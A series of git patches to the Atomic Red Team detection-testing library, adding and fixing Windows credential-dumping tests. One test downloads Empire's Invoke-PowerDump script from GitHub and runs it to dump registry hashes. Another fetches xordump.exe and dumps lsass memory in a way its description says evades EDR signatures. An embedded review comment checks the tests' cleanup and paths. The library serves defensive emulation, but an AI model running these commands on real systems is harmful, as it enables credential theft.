From 7d494dcbce336fbefea9b2d63d54b7205bf99bf7 Mon Sep 17 00:00:00 2001
From: tjgeorgen <67936042+tjgeorgen@users.noreply.github.com>
Date: Tue, 18 May 2021 10:51:47 -0400
Subject: [PATCH 1/5] Fix file path for PowerDump Import (#1466)

seemed to download the module to $Env:Temp then run from .\, so I changed both to $Env:Temp
---
 atomics/T1003.002/T1003.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
 Invoke-PowerDump
 name: powershell
 elevation_required: true

From 6a570c2a4630cf0c2bd41a2e8375b5d5ab92f700 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 18 May 2021 14:52:23 +0000
Subject: [PATCH 2/5] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 2 +-
 atomics/T1003.002/T1003.002.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 71ce48ba..8a0b2d2b 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -22732,7 +22732,7 @@ credential-access:
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
 Invoke-PowerDump
 name: powershell
 elevation_required: true
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index d2b817bc..1516c1da 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
 Invoke-PowerDump
 ```


From bba82c0d5e3c52f076e6b3b0f30af28775bd139f Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Tue, 18 May 2021 11:23:39 -0400
Subject: [PATCH 3/5] adds additional lsass dump test (#1467)

Co-authored-by: Carrie Roberts
---
 atomics/T1003.001/T1003.001.yaml | 35 ++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 2014b6e2..4e5ee4cc 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -138,6 +138,7 @@ atomic_tests:
 del C:\windows\temp\dumpert.dmp >nul 2> nul
 name: command_prompt
 elevation_required: true
+
 - name: Dump LSASS.exe Memory using Windows Task Manager
 auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
 description: |
@@ -158,6 +159,7 @@ atomic_tests:
 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
 name: manual
+
 - name: Offline Credential Theft With Mimikatz
 auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
 description: |
@@ -354,3 +356,36 @@ atomic_tests:
 del #{output_file}
 name: powershell
 elevation_required: true
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+ importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+ file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+ Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: |
+ Computer must have xordump.exe
+ prereq_command: |
+ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+ executor:
+ command: |
+ #{xordump_exe} -out #{output_file} -x 0x41
+ cleanup_command: |
+ Remove-Item ${output_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
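Review bot: The new test's `cleanup_command` in the last hunk uses `${output_file}`, which PowerShell reads as a variable reference rather than the Atomic Red Team input-argument placeholder `#{output_file}` used on the `command:` line and in the preceding test's `del #{output_file}`, so the argument is never substituted, `Remove-Item` gets an empty path, `-ErrorAction Ignore` hides the failure, and the LSASS minidump is left on disk after the test; change it to `Remove-Item #{output_file} -ErrorAction Ignore`. The description tells the operator to expect `$env:TEMP\lsass-xordump.t1003.001.dmp`, while the `output_file` default is `C:\Windows\Temp\lsass-xordump.t1003.001.dmp`; one of the two should be corrected so the verification step points at the right location. `get_prereq_command` passes `-OutFile #{xordump_exe}` unquoted although `prereq_command` quotes the same path, so a path containing spaces would break the download; `-OutFile "#{xordump_exe}"` keeps the two consistent, and since the release binary is fetched without any integrity check a `Get-FileHash` comparison against a known value would be worth adding in the same step. The same `${output_file}` text is carried into the generated copies in patch 5/5 (atomics/Indexes/index.yaml and atomics/T1003.001/T1003.001.md), so fixing this source file and regenerating covers those too.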
From da2dd2b06b04c9bae5f8b034f28abe9ce576e3e0 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator
Date: Tue, 18 May 2021 15:24:12 +0000
Subject: [PATCH 4/5] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1003.001/T1003.001.yaml | 1 +
 atomics/used_guids.txt | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 4e5ee4cc..eb902b08 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -358,6 +358,7 @@ atomic_tests:
 elevation_required: true

 - name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
 description: |
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
 importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eba1dedd..d80b426b 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
 e86f1b4b-fcc1-4a2a-ae10-b49da01458db
 10447c83-fc38-462a-a936-5102363b1c43
 fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697

From e1989f2bec465a65e86ca62d422a66aaf16d233f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 18 May 2021 15:24:18 +0000
Subject: [PATCH 5/5] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 37 +++++++++++++
 atomics/T1003.001/T1003.001.md | 52 +++++++++++++++++++
 6 files changed, 93 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8a3b34df..5381987b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0d36ac..aed4c67a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d9a87458..d3f145a5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -450,6 +450,7 @@
 - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
 - Atomic Test #10: Powershell Mimikatz [windows]
 - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d2bd5efb..c3d3acfa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -50,6 +50,7 @@
 - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
 - Atomic Test #10: Powershell Mimikatz [windows]
 - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8a0b2d2b..9c28f3bc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20953,6 +20953,43 @@ credential-access:
 & "#{createdump_exe}" -u -f #{output_file} $ID
 cleanup_command: 'del #{output_file}

+'
+ name: powershell
+ elevation_required: true
+ - name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: "The memory of lsass.exe is often dumped for offline credential
+ theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+ exported functions. Xordump will re-read the resulting minidump \nfile and
+ delete it immediately to avoid brittle EDR detections that signature lsass
+ minidump files.\n\nUpon successful execution, you should see the following
+ file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: 'Computer must have xordump.exe
+
+'
+ prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+ -OutFile #{xordump_exe}
+
+'
+ executor:
+ command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+ cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
 '
 name: powershell
 elevation_required: true
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index aad552e0..26822e04 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls) +
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec




+
+
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+